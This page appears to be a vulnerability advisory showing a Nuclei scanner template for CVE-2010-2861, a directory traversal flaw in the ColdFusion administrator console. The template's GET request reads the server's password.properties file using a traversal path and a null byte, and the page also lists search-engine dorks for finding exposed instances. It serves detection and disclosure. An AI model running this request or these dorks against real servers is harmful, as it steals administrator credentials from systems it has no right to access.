CVE-2010-2861: Adobe ColdFusion 8.0/8.0.1/9.0/9.0.1 LFI

2025-08-01 Adobe ColdFusion PoC Public

Description

Multiple directory traversal vulnerabilities in the administrator console in Adobe ColdFusion 9.0.1 and earlier allow remote attackers to read arbitrary files via the locale parameter to (1) CFIDE/administrator/settings/mappings.cfm, (2) logging/settings.cfm, (3) datasources/index.cfm, (4) j2eepackaging/editarchive.cfm, and (5) enter.cfm in CFIDE/administrator/.

PoC

id: CVE-2010-2861

info:
  name: Adobe ColdFusion 8.0/8.0.1/9.0/9.0.1 LFI
  author: pikpikcu
  severity: high
  description: Multiple directory traversal vulnerabilities in the administrator console in Adobe ColdFusion 9.0.1 and earlier allow remote attackers to read arbitrary files via the locale parameter to (1) CFIDE/administrator/settings/mappings.cfm, (2) logging/settings.cfm, (3) datasources/index.cfm, (4) j2eepackaging/editarchive.cfm, and (5) enter.cfm in CFIDE/administrator/.
  impact: |
    This vulnerability can lead to unauthorized access to sensitive information and potential compromise of the affected system.
  remediation: Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861
    - http://www.adobe.com/support/security/bulletins/apsb10-18.html
    - http://securityreason.com/securityalert/8148
    - http://securityreason.com/securityalert/8137
    - http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
    cvss-score: 7.5
    cve-id: CVE-2010-2861
    cwe-id: CWE-22
    epss-score: 0.99721
    epss-percentile: 0.99951
    cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: adobe
    product: coldfusion
    shodan-query:
      - http.component:"Adobe ColdFusion"
      - http.component:"adobe coldfusion"
      - http.title:"coldfusion administrator login"
      - cpe:"cpe:2.3:a:adobe:coldfusion"
    fofa-query:
      - title="coldfusion administrator login"
      - app="adobe-coldfusion"
    google-query: intitle:"coldfusion administrator login"
  tags: cve,cve2010,adobe,kev,vulhub,coldfusion,lfi,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "rdspassword="
          - "encrypted="
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100deee8bb00cf00f15cec8df8e5b958eb922dad5563b7bb8e50b129324b00c678602205d0250c20babafb1ed48115b9b61ccee63fbcd780c2605e6372b4d294ac35118:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities